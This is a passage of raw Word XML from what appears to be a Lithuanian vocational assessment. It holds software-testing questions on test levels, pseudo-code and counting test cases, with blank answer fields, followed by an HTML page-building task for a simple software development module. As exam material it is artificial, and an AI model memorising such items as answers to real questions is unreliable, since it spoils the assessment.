          <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:outlineLvl w:val="0"/>
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:outlineLvl w:val="0"/>
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:outlineLvl w:val="0"/>
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00713028" w:rsidRPr="00AD4464" w:rsidRDefault="00713028" w:rsidP="00372B3A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:outlineLvl w:val="0"/>
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="Poteme"/>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
        </w:tabs>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00713028" w:rsidP="00372B3A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>Kuriame iš</w:t>
      </w:r>
      <w:r w:rsidR="00F712CA" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> žemiau pateiktų testavimo lygių</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> testuotojai dalyvauja mažiausiai?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009204EC" w:rsidP="00372B3A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>k</w:t>
      </w:r>
      <w:r w:rsidR="00713028" w:rsidRPr="00AD4464">
        <w:t>omponentų testavimas</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009204EC" w:rsidP="00372B3A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00713028" w:rsidRPr="00AD4464">
        <w:t>istemos testavimas</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009204EC" w:rsidP="00372B3A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>v</w:t>
      </w:r>
      <w:r w:rsidR="00713028" w:rsidRPr="00AD4464">
        <w:t>artotojų priėmimo testavimas</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009204EC" w:rsidP="00372B3A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00713028" w:rsidRPr="00AD4464">
        <w:t>augumo testavimas</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F42D15" w:rsidP="00372B3A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>K</w:t>
      </w:r>
      <w:r w:rsidR="00F712CA" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>ą</w:t>
      </w:r>
      <w:r w:rsidR="00713028" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> daro žemiau pateiktas pseudo-kodas? Kiek skirting</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>ų</w:t>
      </w:r>
      <w:r w:rsidR="00F712CA" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> testų</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> reikėtų</w:t>
      </w:r>
      <w:r w:rsidR="00713028" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> šiam kodui ištestuoti?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A2413" w:rsidRPr="00AD4464" w:rsidRDefault="009A2413" w:rsidP="00372B3A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>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792"/>
      </w:tblGrid>
      <w:tr w:rsidR="00713028" w:rsidRPr="00AD4464" w:rsidTr="00F55F68">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3510" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00713028" w:rsidRPr="00AD4464" w:rsidRDefault="00C35D02" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79A6EEF9" wp14:editId="142AAE76">
                  <wp:extent cx="2478405" cy="2835910"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="17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78405" cy="2835910"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6344" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00713028" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Atsakymas:</w:t>
            </w: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713028" w:rsidRPr="00AD4464" w:rsidRDefault="00713028" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00713028" w:rsidP="00372B3A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Kiek reikia testavimo at</w:t>
      </w:r>
      <w:r w:rsidR="00F42D15" w:rsidRPr="00AD4464">
        <w:t>vejų, kad ištestuotume visą</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> funkcionalumą pavaizduotą schemoje?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB77D1" w:rsidRPr="00AD4464" w:rsidRDefault="00DB77D1" w:rsidP="00372B3A">
      <w:pPr>
        <w:widowControl w:val="0"/>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777"/>
      </w:tblGrid>
      <w:tr w:rsidR="00713028" w:rsidRPr="00AD4464" w:rsidTr="00F55F68">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4077" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00713028" w:rsidRPr="00AD4464" w:rsidRDefault="00C35D02" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44739CD7" wp14:editId="2254B1E2">
                  <wp:extent cx="1934845" cy="2305685"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="17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4845" cy="2305685"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5777" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00713028" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Atsakymas:</w:t>
            </w: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9D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00713028" w:rsidRPr="00AD4464" w:rsidRDefault="00713028" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F712CA" w:rsidP="00372B3A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>Žemiau pateiktą kodą pavaiz</w:t>
      </w:r>
      <w:r w:rsidR="00713028" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>duokite schematiškai (kai</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>p pvz</w:t>
      </w:r>
      <w:r w:rsidR="00757688" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve">  14  klausime). Kiek testų</w:t>
      </w:r>
      <w:r w:rsidR="00B22D87" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> reikia atlikti</w:t>
      </w:r>
      <w:r w:rsidR="00713028" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> norint jį ištestuoti?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00624201" w:rsidRPr="00AD4464" w:rsidRDefault="00624201" w:rsidP="00372B3A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>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777"/>
      </w:tblGrid>
      <w:tr w:rsidR="00713028" w:rsidRPr="00AD4464" w:rsidTr="00F55F68">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4077" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00C35D02" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="36"/>
                <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2638F369" wp14:editId="71DEC17B">
                  <wp:extent cx="2252980" cy="1722755"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="1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2980" cy="1722755"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w:rsidR="00713028" w:rsidRPr="00AD4464" w:rsidRDefault="00713028" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5777" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00713028" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
              <w:t>Atsakymas:</w:t>
            </w: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9D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00713028" w:rsidRPr="00AD4464" w:rsidRDefault="00713028" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc10443952"/>
      <w:bookmarkStart w:id="10" w:name="_Toc13095501"/>
      <w:bookmarkStart w:id="11" w:name="_Toc13833396"/>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A05FD8" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="432" w:right="282" w:hanging="432"/>
        <w:contextualSpacing/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:caps/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc14392415"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidR="00675FA8" w:rsidRPr="00675FA8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Modulis „Nesudėtingos programinės įrangos kūrimas</w:t>
      </w:r>
      <w:r w:rsidR="00713028" w:rsidRPr="00675FA8">
        <w:rPr>
          <w:caps/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
      <w:bookmarkEnd w:id="10"/>
      <w:bookmarkEnd w:id="11"/>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc10443953"/>
      <w:bookmarkStart w:id="14" w:name="_Toc13095502"/>
      <w:bookmarkStart w:id="15" w:name="_Toc13833397"/>
      <w:bookmarkStart w:id="16" w:name="_Toc14392416"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Kompetencija. Projektuoti ir programuoti žiniatinklio puslapių vartotojo sąsajas</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00675FA8" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc10443954"/>
      <w:bookmarkStart w:id="18" w:name="_Toc13095503"/>
      <w:bookmarkStart w:id="19" w:name="_Toc13833398"/>
      <w:bookmarkStart w:id="20" w:name="_Toc14392417"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="000262D2" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Mokymosi rezultatas. Pateikti internetinio puslapio turinį naudojant kompiuterinę žymėjimo kalbą</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
      <w:bookmarkEnd w:id="18"/>
      <w:r w:rsidR="000262D2" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2"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 xml:space="preserve">1 užduotis. </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>PATEIK</w:t>
      </w:r>
      <w:r w:rsidR="00767B4F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ITE</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> TURINĮ HTML ŽYMĖJIMO KALBA (STRAIPSNIS)</w:t>
      </w:r>
      <w:r w:rsidR="00675FA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00C70307" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C70307">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">UŽDUOTIES SĄLYGA: naudojant HTML antraščių, pastraipos, teksto formatavimo, nuorodų elementus, sukurkite tinklapį pagal pateiktą pavyzdį. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>PAVYZDYS:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00C35D02" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:noProof/>
